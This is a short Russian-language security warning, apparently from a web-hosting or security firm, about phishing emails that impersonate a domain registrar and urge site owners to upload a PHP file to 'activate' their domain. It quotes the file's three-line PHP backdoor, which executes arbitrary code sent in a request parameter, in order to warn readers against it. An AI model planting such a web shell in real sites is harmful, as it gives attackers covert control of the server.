В последние несколько недель активизировались хакеры, использующие довольно старый трюк - письмо с поддельным адресом отправителя.
Так нашему клиенту пришла мошенническая рассылка, якобы от лица регистратора, о том, что "В соответствии с изменениями, внесенными в ICANN RAA необходимо активировать домен", для чего предлагается в корне сайта разместить файл с кодом:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Если вам пришлют письмо с подобным содержимым - не обращайте на него внимания, это попытка получить тайный доступ к вашему сайту. Указанные три строчки кода будут выполнять любой запрос переменной [R01]. А в эту переменную злоумышленники могут ввести что им заблагорассудится.
Потому в случае малейших подозрений — уточняйте информацию в службе поддержки вашего регистратора.
Ниже приводим скан письма:
Для
установки защиты сайта заполните форму ниже и наши специалисты свяжутся с вами.
